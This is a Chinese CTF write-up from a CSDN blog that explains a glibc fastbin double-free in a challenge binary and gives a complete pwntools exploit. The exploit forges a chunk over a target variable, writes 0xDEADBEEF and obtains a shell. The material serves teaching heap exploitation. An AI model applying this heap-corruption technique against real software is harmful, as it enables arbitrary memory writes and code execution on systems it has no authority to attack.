Glibc堆利用-Double Free

最新推荐文章于 2024-06-26 19:44:48 发布
最新推荐文章于 2024-06-26 19:44:48 发布
阅读量315 收藏 1
点赞数
分类专栏: chunk pwn 文章标签: 1024程序员节 pwn2own pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pointerr/article/details/120890107
版权
pwn 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
chunk
2 篇文章 0 订阅
订阅专栏

Glibc堆利用-Double Free
漏洞成因:使用完一个chunk之后,只是free掉了指针,没有将内容置null
漏洞结果:free一个chunk之后,再次free,其实该chunk还在free list 里面,可以修改某一个在free list里面的chunk,可以修改该chunk的fd和bk指针,欺骗malloc返回一个任意地址的chunk,可以实现任意地址的写功能。

0x01
这里我们采用了师傅的样例程序,先检查该程序:
在这里插入图片描述
看到:保护全开,使用ida进行反编译分析:
发现经典菜单栏:并且实现了以下功能:

  while ( 2 )
  {
    v10 = 0LL;
    menu();
    scan("%d", &v4);
    switch ( (unsigned int)off_F70 )
    {
      case 1u:
        if ( cnt >= 7 )
        {
          puts("You can't capture more people.");
        }
        else
        {
          v3 = cnt;
          ptr[v3] = malloc(8uLL);
          ++cnt;
          puts("Captured.");
        }
        continue;
      case 2u:
        puts("Index:");
        scan("%d", &v5);
        free(ptr[v5]);
        puts("Eaten.");
        continue;
      case 3u:
        puts("Index:");
        scan("%d", &v5);
        puts("Ingredient:");
        scan("%llu", &v10);
        *(_QWORD *)ptr[v5] = v10;
        puts("Cooked.");
        continue;
      case 4u:
        printf("Your lair is at: %p\n", &lair);
        continue;
      case 5u:                                  // 给target赋值
        puts("Which kingdom?");
        scan("%llu", &v9);
        lair = v9;
        puts("Moved.");
        continue;
      case 6u:
        if ( target == 0xDEADBEEFLL )
          system("/bin/sh");                    // 执行system函数
        puts("Now, there's no Demon Dragon anymore...");
        break;
      default:
        goto LABEL_13;
    }
    break;
  }

可以发现:只要将target赋值为指定数值,即可执行system(’/bin/sh’):
在这里插入图片描述

但是v8初始化为0,且无对v8进行操作的函数。

存在漏洞:double free:
在这里插入图片描述
这里仅仅free掉了该指针,但是并没有将该指针置null,存在double free漏洞。
首先,写好判断条件函数,并加亿点点细节:

from pwn import *
from sys import argv
binary = './samsara'
context.binary = binary
elf = ELF(binary)
p=process('./samsara')

def ret2libc(leak, func, path=''):
	# if path == '':
	# 	libc = LibcSearcher(func, leak)
	# 	base = leak - libc.dump(func)
	# 	system = base + libc.dump('system')
	# 	binsh = base + libc.dump('str_bin_sh')
	# else:
    libc = ELF(path)
    base = leak - libc.sym[func]
    system = base + libc.sym['system']
    binsh = base + libc.search('/bin/sh').next()
    return (system, binsh)

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def dbg():
	gdb.attach(p)
	pause()

def add(size):
    sla('> ','1')

def free(idx):
    ru('choice > ')
    sl('2')
    sl(str(idx))

def edit(index,content):
	sla('> ','3')
	sla(':\n',str(index))
	sla(':\n',content)

def print_target():
    sla('> ', '4')
    ru('0x')
    return int(ru('\n'), 16)

def edit_target(target):
    sla('> ','5')
    sla('Which kingdom?',str(target))

def get_shell():
    sla('> ','6')

首先,我们申请三个chunk,并产生double free条件:

add() # 0
add() # 1
add() # 2
delete(0)
delete(1)
delete(0)
dbg()

调试结果:
在这里插入图片描述
可以发现在fastbin中,存在double free漏洞,即两个chunk同时指向了同一个chunk:

0x20: 0x56065b19e010 —▸ 0x56065b19e030 ◂— 0x56065b19e010

这里,我们继续add两个chunk,使得:
第一个为原来的1号chunk
第二个为原来的0号chunk:
这样,原来的chunk区域就变成了:
在这里插入图片描述
是因为:
free0号chunk,free1号chunk,再次free0号chunk,但是再次申请的时候,按照计算机的顺序是无视了第二次被free的0号chunk,先取1号chunk,再取第一次被free的0号chunk。
这样,我们就可以构造一个fake_chunk:

edit_target(0x20)
fake = print_target()-8

其中,edit_target表示
在这里插入图片描述
在这里插入图片描述

而lair变量的值就处于target变量上方8个字节,在liar这个地方伪造一个chunk,写作0x20,伪造chunk的chunk指针在lair地址-8的地方,也就是target地址减去0x10的地方,使得target处于mem指针这个地方。
然后:

edit(3,fake)

表示更改0号chunk,fd指针为我们构造好的地址:

在这里插入图片描述

之后,再次add两个chunk,然后更改fake chunk里面的内容:

add() # 5
add() # 6
edit(6,0xdeadbeef)

这里,第一个add表示add第一个chunk,第二个add表示自己构造的fake_chunk。然后edit构造的fake_chunk为0xDEADBEEF:
在这里插入图片描述
成功的将oxDEADBEEF写入了我们构造的fake_chunk当中,并且使得chunk0的fd指针指向了fake_chunk,接下来直接执行后门函数就可以getshell:

sla('> ','6')
itr()

在这里插入图片描述
完整exp:

from pwn import *
from sys import argv
binary = './samsara'
context.binary = binary
elf = ELF(binary)
p=process('./samsara')

def ret2libc(leak, func, path=''):
	# if path == '':
	# 	libc = LibcSearcher(func, leak)
	# 	base = leak - libc.dump(func)
	# 	system = base + libc.dump('system')
	# 	binsh = base + libc.dump('str_bin_sh')
	# else:
    libc = ELF(path)
    base = leak - libc.sym[func]
    system = base + libc.sym['system']
    binsh = base + libc.search('/bin/sh').next()
    return (system, binsh)

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def dbg():
	gdb.attach(p)
	pause()

def add():
    sla('> ','1')

def free(idx):
    ru('choice > ')
    sl('2')
    sl(str(idx))

def edit(index,content):
	sla('> ','3')
	sla(':\n',str(index))
	sla(':\n',content)

def print_target():
    sla('> ', '4')
    ru('0x')
    return int(ru('\n'), 16)

def edit_target(target):
    sla('> ','5')
    sla('Which kingdom?',str(target))

def get_shell():
    sla('> ','6')


add()   #0
add()   #1
add()   #2
free(0)  #0-free 1-use 2-use

free(1)  #0-free 1-free 2-use

free(0)  #0-double free 1-free 2-use

add()

add()
edit_target(0x20)
fake = print_target()-8
print(hex(fake))
edit(3,fake)


add() # 5

add() # 6
edit(6,0xdeadbeef)
sla('> ','6')
itr()
p0int3r
关注
专栏目录
综合交易平台CTP Linux Double Free解决方案
03-16
*** glibc detected *** ./bin/quant_ctp_XTrader_no_debug_2017-03-16_15-36-20: double free or corruption (!prev): 0x0000000001d71120 *** ======= Backtrace: ========= /lib64/libc.so.6[0x32b4a75f3e] /lib...
关于如何理解Glibc管理器(Ⅲ——从DoubleFree深入理解Bins)
Tokameine的博客
08-01 413
本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。 若有图片及文稿引用,将在本篇结尾处著名来源。 环境与工具: Ubuntu16.4 / gcc / (gdb)pwn-dbg 范例:howtoheap2 搭建调试环境: git clone https://github.com/shellphish/how2heap.git cd how2heap make 对于GitHub可能速度过慢的情况,可以尝...
2.27 house of botcake
2301_79879963的博客
05-31 1523
2.23-2.39 都有double free 针对fastbin2.27-2.35 tcachebin引入之后没有double free,但是可以有其他方式来间接实现double free理论上的double freefree 0xa0大小的块进入tcachebin 满7个(实际下标为0-6),free第8个同大小块时则会进入unsortedbin,这时从tcachebin申请回来一个块,再free第8个块,就进入了tcachebin,这样实现了理论上的double free,但是实际上这样操作
【C语言】解决C语言报错:Double Free
最新发布
Easonmax的博客
06-26 1452
Double Free(双重释放)是C语言中一种常见且危险的内存管理错误。它通常在程序尝试释放已经释放的内存时发生,可能导致程序崩溃、数据损坏,甚至被恶意利用。本文将详细介绍Double Free的产生原因,提供多种解决方案,并通过实例代码演示如何有效避免和解决此类错误。Double Free,即双重释放,是指程序在释放某块内存后,又尝试再次释放该内存。这种错误会破坏内存管理机制,导致程序行为不可预测,通常会触发运行时错误(如段错误)或内存破坏。
glibc detected *** double free 错误解决方法
爱自在的专栏
01-19 2774
glibc detected *** double free 错误解决方法 定位问题:*** glibc detected *** : double free or corruption (!prev): 0x09b077d8 Q: 在执行一个程序时,出现如下错误: *** glibc detected *** double free or corruption: 0x0937d008 *** 是...
初学 UAF漏洞及double free 利用手法(libc2.23)
weixin_66751120的博客
03-06 1178
UAF漏洞及double free 利用手法(libc2.23) 通过一道例题加深理解
ctf-pwn tc和smallbin的doublefree利用
蚁景网安学院
07-15 442
前言:之前曾经有了解过libc.2.31下tc和smallbin的联合利用, 但是那次看到的是malloc与calloc的使用, 所以这次借助TCTF2021的listbook来讲讲2.3...
利用:这本有关利用的书是了解glibc内部以及对结构可能发生的各种攻击的指南
02-05
4. **溢出技术**:详述如何利用溢出进行栈溢出攻击的升级,以及如何通过溢出来操控程序执行流。 5. **double-free漏洞**:分析double-free漏洞产生的原因,以及利用该漏洞执行任意代码的常见方法。 6. **use...
glibc-2.3.6.tar.gz
03-04
《GNU C 库 glibc-2.3.6 深度解析》 GNU C 库(GNU C Library),简称 glibc,是 Linux 和其他类 Unix 系统中广泛使用的 C 库。...通过深入理解并有效利用 glibc 提供的功能,开发者可以编写出效、稳定的程序。
memory leak & double free如何排查?
02-26
在IT行业中,内存泄露(Memory Leak)和双重释放(Double Free)问题会严重威胁程序的稳定性和性能。本文旨在介绍如何通过自主构建工具的方式,排查内存泄露和双重释放问题,而不是依赖现有的内存排查工具。本文将...
漏洞的利用技巧1
08-03
在实战中,利用漏洞的常见技术包括Heap Fengshui(调整内存布局以达到特定目的)、Heap Spray(大量分配内存以改变的分布状态)以及Exploit mmap Chunk(利用mmap映射的内存块)。通过这些技巧,攻击者可以更...
【二进制安全】漏洞:Double Free原理
Juruo@Security
08-01 1234
【二进制安全】Double Free原理
从两道基础题简单认识和了解fastbin double free漏洞的利用
weixin_44864859的博客
07-13 1024
fastbin double free原理 Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个块,相当于多个指针指向同一个块,结合块的数据内容可以实现类似于类型混淆 (type confused) 的效果。(即可以构造假的chunk实现任意地址写) Fastbin Double Free 能够成功利用主要有两部分的原因 fastbin 的块被释放后
glibc 小白指南
Justin_yip blog
03-17 2073
欢迎来到glibc教程!本教程将介绍glibc (GNU C Library) 的基础知识和使用方法。glibc是一个标准的C语言库,用于GNU操作系统和其他类Unix系统,它提供了大量的基础函数和例程,对于大多数C程序的正确运行是必不可少的。让我们开始吧!
【C语言】glibc
数字人生
03-06 791
在Debian系统中,通过`apt install glibc-source`命令安装的`glibc`源码通常会被放置在`/usr/src/glibc`目录下。请注意,如果是为了开发或者特定目的需要阅读或修改`glibc`的源码,通常建议直接从`glibc`的官方版本控制库(例如 Git)中克隆源码,这样可以获取最新的或是特定版本的源码,并且更容易获得社区的支持。或者访问`glibc`在源代码托管网站(如 sourceware.org)的页面,以获取其他可用的获取源码的方式或是具体的版本标签。
Double free 漏洞复现与利用
vivid_moon的博客
05-29 5665
2018体系结构安全大作业申明:转载请注明出处选题:2015 年 0ctf 题题目描述:提供记事本功能的二进制文件,找出其漏洞,get shell第一章 操作说明为方便老师审核作业,本报告将操作说明放在第一章。操作流程如下:1 、安装 netcat 。2 、安装 pwntools 库。命令: pip install pwntools (安装过程中,一定要保证网络畅通,曾经因为网不好装这个库装了一个...
Linux下glibc库说明一
wojiaxiaohuang2014的博客
10-01 2530
glibc库,libc库与glib
学习——Double Free
qq_41560595的博客
03-10 1439
Double Free,内容如其名,同一个内存块被释放两次。 示例代码 #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n"); // 分配三个chunk:a、b、c。
delete与double free
10-29 411
在看一些C++的文章的时候,经常会看到关于delete与free的区别,delete不需要检查指针是否为NULL。如下面一篇文章http://www.cnblogs.com/zhuyp1015/archive/2012/07/20/2601698.html。 但是有时候,又会看到由于delete引起的double free or corruption,我们可以写一个很简单的程序,来测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值